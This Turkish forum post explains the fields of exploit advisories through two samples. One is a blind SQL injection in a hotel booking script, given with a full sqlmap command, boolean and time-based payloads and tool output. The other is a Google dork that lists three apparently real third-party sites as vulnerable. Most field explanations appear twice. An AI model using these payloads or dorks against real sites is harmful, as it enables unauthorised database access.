Merhabalar. Aslında bu konu oldukça basit fakat paylaşım biçimi nedeniyle karmaşıkmış gibi gözüküyor. Bu konuda 1 adet Script'in belirli dizinindeki açığın anlatımını ve bir adet GHDB Dork'unun açıklamasını yapacağım.
Kod:
#############################################################
# Application Name : Online Hotel Booking System V2.0
# Vulnerable Type : Boolean-Based Blind SQL njection & Time-Based Blind SQL İnjection
# Software Link: https://www.bestsoftinc.com/
# Tested On Demo Site:
http://envato.bestsoftinc.net/hotel-booking/
# Author: Siber Gvenlik Akademisi - Pentester
# Date: 08.05.2017
# Tested on: Windows 8.1 / Mozilla Firefox
# Vulnerable Parameter: 'capacity' (POST)
# SQLİ: http://localhost/hotel-booking/booking-search.php
# Proof of concept:
sqlmap -u "http://localhost/hotel-booking/booking-search.php/" --data="check_in=05%2F09%2F2017&check_out=05%2F16%2F2017&capacity=1" -p "capacity" --random-agent --threads=5 --dbs
Parameter: capacity (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: check_in=05/09/2017&check_out=05/24/2017&capacity=1 AND 3025=3025
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: check_in=05/09/2017&check_out=05/24/2017&capacity=1 AND SLEEP(5)
---
[15:39:02] [INFO] the back-end DBMS is MySQL
web server operating system: Linux CentOS
web application technology: Apache 2.4.6, PHP 5.4.16
back-end DBMS: MySQL 5.0.12
Application Name: Zaafiyeti bulunduran script veya eklentinin ismi.
Vulnerable Type: Hangi zaafiyetin bulunduğu burdadır.
Software Link: Script yapımcısının web adresi
Tested on Demo Site: Açığın test edildiği ve olumlu sonuç alındığı site veya siteler.
Author: GHDB Dork'un yazarı.
Date: GHDB'nin keşif tarihi
Tested On: Açığın test edildiği işletim sistemleri ve tarayıcılar.
Vulnerable Parameter: Zaafiyetin bulunduğu parametre.
SQLi: SQL Enjeksiyon açığının olduğu dizin (/localhost/ sonrası)
Proof of Concept: Burada SQLMAP ile gerekli parametreler girilerek sonuç alabileceğinin kanıtı gösterilmiştir.
Vulnerable Type: Hangi zaafiyetin bulunduğu burdadır.
Software Link: Script yapımcısının web adresi
Tested on Demo Site: Açığın test edildiği ve olumlu sonuç alındığı site veya siteler.
Author: GHDB Dork'un yazarı.
Date: GHDB'nin keşif tarihi
Tested On: Açığın test edildiği işletim sistemleri ve tarayıcılar.
Vulnerable Parameter: Zaafiyetin bulunduğu parametre.
SQLi: SQL Enjeksiyon açığının olduğu dizin (/localhost/ sonrası)
Proof of Concept: Burada SQLMAP ile gerekli parametreler girilerek sonuç alabileceğinin kanıtı gösterilmiştir.
Kod:
# Application Name : Webrex Technologies SQL Injection
# Vulnerable Type : SQL İnjection
# GHDB Dork: inurl:php?id= intext:Powered by Webrex Technologies
# Author: fl3xpl0it ****.a. KurokoTetsuya // Siber Güvenlik Akademisi //
# Contact: https://www.twitter.com/KurokoTetsuyaTK
# Date: 12.05.2017
# Tested On Demo Sites:
[+] http://www.riplus.org/subcategory.php?id=15
[+] http://shyamjeesafety.com/subservice.php?id=14
[+] http://www.parkovic.com/category.php?id=3
Application Name: İlk exploitteki terim ile aynı anlama gelmekte.
Vulnerable Type: İlk exploitteki terim ile aynı anlama gelmekte.
GHDB Dork: Google'da taratılacak dork
Author: GHDB yazarı
Contact: Yazar ile iletişim adresi
Date: Tarih, ilk exploitteki terim ile aynı anlama gelmekte.
Tested on Demo Sites: İlk exploitteki terim ile aynı anlama gelmekte.
Vulnerable Type: İlk exploitteki terim ile aynı anlama gelmekte.
GHDB Dork: Google'da taratılacak dork
Author: GHDB yazarı
Contact: Yazar ile iletişim adresi
Date: Tarih, ilk exploitteki terim ile aynı anlama gelmekte.
Tested on Demo Sites: İlk exploitteki terim ile aynı anlama gelmekte.